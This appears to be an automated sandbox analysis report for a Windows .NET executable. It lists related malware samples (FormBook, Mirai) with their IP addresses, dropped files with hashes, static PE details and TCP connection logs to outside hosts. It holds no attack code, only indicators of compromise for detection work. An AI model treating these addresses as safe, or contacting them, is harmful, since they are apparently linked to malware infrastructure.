                                                    AMAZON-AESUShttps://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzIzOTU1LCJuYmYiOjE3MjgzMjM5NTUsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiIxMzhudno3eXlrZ2h1NDA5OGZrYiIsInRva2VuIjoiMTM4bnZ6N3l5a2dodTQwOThma2IiLCJzZW5kX2F0IjoxNzI4MzIyODA2LCJlbWFpbF9pZCI6OTk2NDk2NywiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTQ0ODIsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj1XZSUyN3JlK3Rha2luZytvdmVyK3RoaXMrTmF0aW9uYWwrRGF5In0.z00HBrh18YFkCiPz9m_Gcq8DkC4g7ZLK6Qs5LoMEHUoGet hashmaliciousHTMLPhisherBrowse
                                                    • 3.217.201.113
                                                    na.elfGet hashmaliciousUnknownBrowse
                                                    • 54.54.164.187
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 54.136.161.102
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 34.202.179.186
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 34.202.220.133
                                                    http://www.gofreight.com/Get hashmaliciousUnknownBrowse
                                                    • 3.212.99.33
                                                    attachment (15).emlGet hashmaliciousUnknownBrowse
                                                    • 52.206.205.81
                                                    http://fortcollinsfineart.com/Get hashmaliciousUnknownBrowse
                                                    • 52.7.22.181
                                                    original.emlGet hashmaliciousHtmlDropperBrowse
                                                    • 52.5.13.197
                                                    https://www-washingtoncountyinsider-com.webpkgcache.com/doc/-/s/www.washingtoncountyinsider.com//Get hashmaliciousUnknownBrowse
                                                    • 3.5.1.211
                                                    INTERNET-CZKtis238403KtisCZlPX6PixV4t.exeGet hashmaliciousFormBookBrowse
                                                    • 81.2.196.19
                                                    Z6s208B9QX.exeGet hashmaliciousFormBookBrowse
                                                    • 81.2.196.19
                                                    POPO00003964.exeGet hashmaliciousFormBookBrowse
                                                    • 81.2.196.19
                                                    YSjOEAta07.exeGet hashmaliciousFormBookBrowse
                                                    • 81.2.196.19
                                                    RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                    • 81.2.196.19
                                                    Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                    • 81.2.196.19
                                                    Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                                                    • 81.2.196.19
                                                    PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                    • 81.2.196.19
                                                    SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                    • 81.2.196.19
                                                    New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                    • 81.2.196.19
                                                    NAMECHEAP-NETUS9vhyFG1hNa.exeGet hashmaliciousFormBookBrowse
                                                    • 162.0.238.43
                                                    8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                    • 162.0.238.43
                                                    lPX6PixV4t.exeGet hashmaliciousFormBookBrowse
                                                    • 199.192.21.169
                                                    LegionLoader (13).msiGet hashmaliciousUnknownBrowse
                                                    • 162.255.119.168
                                                    LegionLoader (14).msiGet hashmaliciousUnknownBrowse
                                                    • 162.255.119.168
                                                    LegionLoader (15).msiGet hashmaliciousUnknownBrowse
                                                    • 162.255.119.168
                                                    LegionLoader (10).msiGet hashmaliciousUnknownBrowse
                                                    • 162.255.119.168
                                                    LegionLoader (11).msiGet hashmaliciousUnknownBrowse
                                                    • 162.255.119.168
                                                    LegionLoader (12).msiGet hashmaliciousUnknownBrowse
                                                    • 162.255.119.168
                                                    LegionLoader (9).msiGet hashmaliciousUnknownBrowse
                                                    • 162.255.119.168

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NU1aAbSmCr.exe.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\NU1aAbSmCr.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.34331486778365
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):2232
                                                    Entropy (8bit):5.380285623575084
                                                    Encrypted:false
                                                    SSDEEP:48:+WSU4xympjgs4Rc9tEoUl8NPZHUl7u1iMugeC/ZM0Uyus:+LHxvCsIcnSKRHmOugw1s
                                                    MD5:2934CA20BBFAEA7EF443B53BCDE1CF1B
                                                    SHA1:EDC8343ECF9C01C447AB954CB93C19A83A8DBB8E
                                                    SHA-256:791F1B8BF492FC44797F1ECE7BA3B4767EE63FB502B39C3D328FA70DC88D54C8
                                                    SHA-512:22C39B94B5F046696CC84CF5F468F1ABF44A896A9B12B1A60046EEA9F9E92D30810A5FECDB989FB1803D859F0253F8A3578E58310A6E408686B3B86723DE9820
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............V.}...@...i...........System.Transactions.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                    C:\Users\user\AppData\Local\Temp\41392M9L

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\NETSTAT.EXE
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.1221538113908904
                                                    Encrypted:false
                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                    MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                    SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                    SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                    SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1y1zcoq0.b1c.psm1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixrxqhbp.4x5.ps1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jcng3qjk.stx.psm1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xo04vr5o.f0n.ps1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.872759766194143
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:NU1aAbSmCr.exe
                                                    File size:694'784 bytes
                                                    MD5:519b9a9e52aa6e23736f01afa4001654
                                                    SHA1:dd28761acf65483cf2de998e93b9490afb27f196
                                                    SHA256:ee229e0094d512a8a9e8210e75ca4319384360113b541aa7a10ed301e0425830
                                                    SHA512:ab5444d71d20f010f1ff695baefcb43bbfe902f112a2cf077178a2772535854f8de56fa81c77bfb22af5972b377b2c89553ceb51702f15da411b4b9060f4f318
                                                    SSDEEP:12288:WHoc9jfIvg+0pYFFt8tLhCCIzOCXOqhGO1mPkNEKXD5p7iYYLM6ipxCbyUjU1zdL:Qzf/pYFwVXQOMOqhGPkN5T5pBYZwAWGU
                                                    TLSH:0BE412481A9AD517D4E70BF80A20C2B057F95EDD6A27E3035FEE7DEB7C26B502840792
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................................@................................

                                                    File Icon

                                                    Icon Hash:00928e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4aafc2
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0xC29198FE [Sat Jun 10 12:03:10 2073 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xaaf6f0x4f.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000x5bc.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xae0000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xa99080x70.text
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000xa8fc80xa9000218397325eb92010b70ead0eab018cb4False0.9420057669193787data7.879696863228832IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc0xac0000x5bc0x600219465ccd13ac264281b8dc526c0f1aaFalse0.421875data4.107203732502543IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0xae0000xc0x20033a1ab43d87f217824f4a02dc00b4541False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_VERSION0xac0900x32cdata0.4273399014778325
                                                    RT_MANIFEST0xac3cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 9, 2024 14:01:59.869179010 CEST4998080192.168.2.981.2.196.19
                                                    Oct 9, 2024 14:01:59.874217033 CEST804998081.2.196.19192.168.2.9
                                                    Oct 9, 2024 14:01:59.874310970 CEST4998080192.168.2.981.2.196.19
                                                    Oct 9, 2024 14:01:59.885922909 CEST4998080192.168.2.981.2.196.19
                                                    Oct 9, 2024 14:01:59.890758038 CEST804998081.2.196.19192.168.2.9
                                                    Oct 9, 2024 14:02:00.547663927 CEST804998081.2.196.19192.168.2.9
                                                    Oct 9, 2024 14:02:00.547756910 CEST804998081.2.196.19192.168.2.9
                                                    Oct 9, 2024 14:02:00.548069000 CEST4998080192.168.2.981.2.196.19
                                                    Oct 9, 2024 14:02:00.552664995 CEST4998080192.168.2.981.2.196.19
                                                    Oct 9, 2024 14:02:00.557549000 CEST804998081.2.196.19192.168.2.9
                                                    Oct 9, 2024 14:02:15.678764105 CEST4998180192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:15.683821917 CEST804998165.21.196.90192.168.2.9
                                                    Oct 9, 2024 14:02:15.683918953 CEST4998180192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:15.698322058 CEST4998180192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:15.704651117 CEST804998165.21.196.90192.168.2.9
                                                    Oct 9, 2024 14:02:16.350398064 CEST804998165.21.196.90192.168.2.9
                                                    Oct 9, 2024 14:02:16.351197958 CEST804998165.21.196.90192.168.2.9
                                                    Oct 9, 2024 14:02:16.351267099 CEST4998180192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:17.214054108 CEST4998180192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:18.232841015 CEST4998280192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:18.237804890 CEST804998265.21.196.90192.168.2.9
                                                    Oct 9, 2024 14:02:18.237922907 CEST4998280192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:18.249644041 CEST4998280192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:18.254532099 CEST804998265.21.196.90192.168.2.9
                                                    Oct 9, 2024 14:02:18.896882057 CEST804998265.21.196.90192.168.2.9
                                                    Oct 9, 2024 14:02:18.896910906 CEST804998265.21.196.90192.168.2.9
                                                    Oct 9, 2024 14:02:18.897203922 CEST4998280192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:19.760979891 CEST4998280192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:20.779750109 CEST4998380192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:20.784775019 CEST804998365.21.196.90192.168.2.9
                                                    Oct 9, 2024 14:02:20.784900904 CEST4998380192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:20.795475006 CEST4998380192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:20.800617933 CEST804998365.21.196.90192.168.2.9
                                                    Oct 9, 2024 14:02:20.800767899 CEST804998365.21.196.90192.168.2.9
                                                    Oct 9, 2024 14:02:21.471190929 CEST804998365.21.196.90192.168.2.9
                                                    Oct 9, 2024 14:02:21.471543074 CEST804998365.21.196.90192.168.2.9
                                                    Oct 9, 2024 14:02:21.471616030 CEST4998380192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:22.307732105 CEST4998380192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:23.326504946 CEST4998480192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:23.332523108 CEST804998465.21.196.90192.168.2.9
                                                    Oct 9, 2024 14:02:23.332628012 CEST4998480192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:23.339941025 CEST4998480192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:23.344850063 CEST804998465.21.196.90192.168.2.9
                                                    Oct 9, 2024 14:02:23.989788055 CEST804998465.21.196.90192.168.2.9
                                                    Oct 9, 2024 14:02:23.989862919 CEST804998465.21.196.90192.168.2.9
                                                    Oct 9, 2024 14:02:23.989964962 CEST4998480192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:23.992594004 CEST4998480192.168.2.965.21.196.90
                                                    Oct 9, 2024 14:02:23.997787952 CEST804998465.21.196.90192.168.2.9
                                                    Oct 9, 2024 14:02:29.165656090 CEST4998580192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:29.170783043 CEST804998544.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:29.171057940 CEST4998580192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:29.183646917 CEST4998580192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:29.188823938 CEST804998544.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:30.698379993 CEST4998580192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:30.795749903 CEST804998544.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:30.795877934 CEST4998580192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:31.717153072 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:31.722170115 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:31.722280025 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:31.733153105 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:31.738042116 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.063723087 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.064151049 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.064183950 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.064189911 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.064203024 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.064241886 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.083913088 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.083950996 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.083964109 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.083996058 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.084068060 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.084079981 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.084090948 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.084112883 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.084137917 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.084295034 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.084309101 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.084321022 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.084340096 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.135941982 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.151124001 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.151164055 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.151175022 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.151246071 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.151257992 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.151269913 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.151423931 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.151438951 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.151487112 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.171014071 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.171041012 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.171052933 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.171063900 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.171077967 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.171176910 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.171226978 CEST4998680192.168.2.944.213.25.70
